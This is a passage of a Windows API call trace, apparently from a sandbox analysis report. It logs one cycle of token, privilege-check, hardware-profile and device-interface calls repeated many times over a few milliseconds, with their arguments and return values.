0x3 [0017.042] GetLastError () returned 0x578 [0017.042] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.042] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.042] GetCurrentThread () returned 0xfffffffe [0017.042] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.042] GetLastError () returned 0x3f0 [0017.042] GetCurrentProcess () returned 0xffffffff [0017.042] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.042] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.042] SetLastError (dwErrCode=0x522) [0017.042] CloseHandle (hObject=0x114) returned 1 [0017.042] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.042] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.042] GetLastError () returned 0x578 [0017.042] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.042] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.042] GetCurrentThread () returned 0xfffffffe [0017.042] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.042] GetLastError () returned 0x3f0 [0017.042] GetCurrentProcess () returned 0xffffffff [0017.042] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.043] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.043] SetLastError (dwErrCode=0x522) [0017.043] CloseHandle (hObject=0x114) returned 1 [0017.043] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.043] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.043] GetLastError () returned 0x578 [0017.043] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.043] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.043] GetCurrentThread () returned 0xfffffffe [0017.043] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.043] GetLastError () returned 0x3f0 [0017.043] GetCurrentProcess () returned 0xffffffff [0017.043] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.043] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.043] SetLastError (dwErrCode=0x522) [0017.043] CloseHandle (hObject=0x114) returned 1 [0017.043] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.043] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.043] GetLastError () returned 0x578 [0017.043] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.043] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.043] GetCurrentThread () returned 0xfffffffe [0017.043] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.043] GetLastError () returned 0x3f0 [0017.043] GetCurrentProcess () returned 0xffffffff [0017.043] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.043] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.043] SetLastError (dwErrCode=0x522) [0017.043] CloseHandle (hObject=0x114) returned 1 [0017.043] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.043] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.043] GetLastError () returned 0x578 [0017.043] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.043] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.043] GetCurrentThread () returned 0xfffffffe [0017.043] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.043] GetLastError () returned 0x3f0 [0017.043] GetCurrentProcess () returned 0xffffffff [0017.043] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.043] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.043] SetLastError (dwErrCode=0x522) [0017.043] CloseHandle (hObject=0x114) returned 1 [0017.043] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.043] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.044] GetLastError () returned 0x578 [0017.044] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.044] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.044] GetCurrentThread () returned 0xfffffffe [0017.044] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.044] GetLastError () returned 0x3f0 [0017.044] GetCurrentProcess () returned 0xffffffff [0017.044] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.044] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.044] SetLastError (dwErrCode=0x522) [0017.044] CloseHandle (hObject=0x114) returned 1 [0017.044] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.044] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.044] GetLastError () returned 0x578 [0017.044] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.044] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.044] GetCurrentThread () returned 0xfffffffe [0017.044] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.044] GetLastError () returned 0x3f0 [0017.044] GetCurrentProcess () returned 0xffffffff [0017.044] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.044] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.044] SetLastError (dwErrCode=0x522) [0017.044] CloseHandle (hObject=0x114) returned 1 [0017.044] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.044] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.044] GetLastError () returned 0x578 [0017.044] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.044] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.044] GetCurrentThread () returned 0xfffffffe [0017.044] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.044] GetLastError () returned 0x3f0 [0017.044] GetCurrentProcess () returned 0xffffffff [0017.044] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.044] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.044] SetLastError (dwErrCode=0x522) [0017.044] CloseHandle (hObject=0x114) returned 1 [0017.044] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.044] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.044] GetLastError () returned 0x578 [0017.044] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.044] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.044] GetCurrentThread () returned 0xfffffffe [0017.044] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.045] GetLastError () returned 0x3f0 [0017.045] GetCurrentProcess () returned 0xffffffff [0017.045] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.045] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.045] SetLastError (dwErrCode=0x522) [0017.045] CloseHandle (hObject=0x114) returned 1 [0017.045] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.045] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.045] GetLastError () returned 0x578 [0017.045] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.045] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.045] GetCurrentThread () returned 0xfffffffe [0017.045] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.045] GetLastError () returned 0x3f0 [0017.045] GetCurrentProcess () returned 0xffffffff [0017.045] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.045] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.045] SetLastError (dwErrCode=0x522) [0017.045] CloseHandle (hObject=0x114) returned 1 [0017.045] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.045] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.045] GetLastError () returned 0x578 [0017.045] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.045] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.045] GetCurrentThread () returned 0xfffffffe [0017.045] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.045] GetLastError () returned 0x3f0 [0017.045] GetCurrentProcess () returned 0xffffffff [0017.045] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.045] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.045] SetLastError (dwErrCode=0x522) [0017.045] CloseHandle (hObject=0x114) returned 1 [0017.045] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.045] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.045] GetLastError () returned 0x578 [0017.045] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.045] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.045] GetCurrentThread () returned 0xfffffffe [0017.045] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.045] GetLastError () returned 0x3f0 [0017.045] GetCurrentProcess () returned 0xffffffff [0017.045] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.045] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.045] SetLastError (dwErrCode=0x522) [0017.045] CloseHandle (hObject=0x114) returned 1 [0017.046] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.046] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.046] GetLastError () returned 0x578 [0017.046] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.046] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.046] GetCurrentThread () returned 0xfffffffe [0017.046] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.046] GetLastError () returned 0x3f0 [0017.046] GetCurrentProcess () returned 0xffffffff [0017.046] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.046] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.046] SetLastError (dwErrCode=0x522) [0017.046] CloseHandle (hObject=0x114) returned 1 [0017.046] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.046] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.046] GetLastError () returned 0x578 [0017.046] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.046] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.046] GetCurrentThread () returned 0xfffffffe [0017.046] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.046] GetLastError () returned 0x3f0 [0017.046] GetCurrentProcess () returned 0xffffffff [0017.046] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.046] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.046] SetLastError (dwErrCode=0x522) [0017.046] CloseHandle (hObject=0x114) returned 1 [0017.046] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.046] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.046] GetLastError () returned 0x578 [0017.046] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.046] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.046] GetCurrentThread () returned 0xfffffffe [0017.046] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.046] GetLastError () returned 0x3f0 [0017.046] GetCurrentProcess () returned 0xffffffff [0017.046] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.046] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.046] SetLastError (dwErrCode=0x522) [0017.046] CloseHandle (hObject=0x114) returned 1 [0017.047] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.047] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.047] GetLastError () returned 0x578 [0017.047] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.047] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.047] GetCurrentThread () returned 0xfffffffe [0017.047] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.047] GetLastError () returned 0x3f0 [0017.047] GetCurrentProcess () returned 0xffffffff [0017.047] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.047] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.047] SetLastError (dwErrCode=0x522) [0017.047] CloseHandle (hObject=0x114) returned 1 [0017.047] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.047] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.047] GetLastError () returned 0x578 [0017.047] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.047] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.047] GetCurrentThread () returned 0xfffffffe [0017.047] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.047] GetLastError () returned 0x3f0 [0017.047] GetCurrentProcess () returned 0xffffffff [0017.047] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.047] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.047] SetLastError (dwErrCode=0x522) [0017.047] CloseHandle (hObject=0x114) returned 1 [0017.047] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.047] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.047] GetLastError () returned 0x578 [0017.047] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.047] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.047] GetCurrentThread () returned 0xfffffffe [0017.047] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.047] GetLastError () returned 0x3f0 [0017.047] GetCurrentProcess () returned 0xffffffff [0017.047] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.047] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.047] SetLastError (dwErrCode=0x522) [0017.048] CloseHandle (hObject=0x114) returned 1 [0017.048] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.048] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.048] GetLastError () returned 0x578 [0017.048] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.048] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.048] GetCurrentThread () returned 0xfffffffe [0017.048] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.048] GetLastError () returned 0x3f0 [0017.048] GetCurrentProcess () returned 0xffffffff [0017.048] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.048] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.048] SetLastError (dwErrCode=0x522) [0017.048] CloseHandle (hObject=0x114) returned 1 [0017.048] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.048] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.048] GetLastError () returned 0x578 [0017.048] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.048] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.048] GetCurrentThread () returned 0xfffffffe [0017.048] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.048] GetLastError () returned 0x3f0 [0017.048] GetCurrentProcess () returned 0xffffffff [0017.048] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.048] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.048] SetLastError (dwErrCode=0x522) [0017.048] CloseHandle (hObject=0x114) returned 1 [0017.048] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.048] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.048] GetLastError () returned 0x578 [0017.048] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.048] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.048] GetCurrentThread () returned 0xfffffffe [0017.048] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.048] GetLastError () returned 0x3f0 [0017.048] GetCurrentProcess () returned 0xffffffff [0017.048] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.048] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.048] SetLastError (dwErrCode=0x522) [0017.048] CloseHandle (hObject=0x114) returned 1 [0017.048] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.048] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.048] GetLastError () returned 0x578 [0017.048] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.048] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.049] GetCurrentThread () returned 0xfffffffe [0017.049] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.049] GetLastError () returned 0x3f0 [0017.049] GetCurrentProcess () returned 0xffffffff [0017.049] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.049] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.049] SetLastError (dwErrCode=0x522) [0017.049] CloseHandle (hObject=0x114) returned 1 [0017.049] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.049] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, 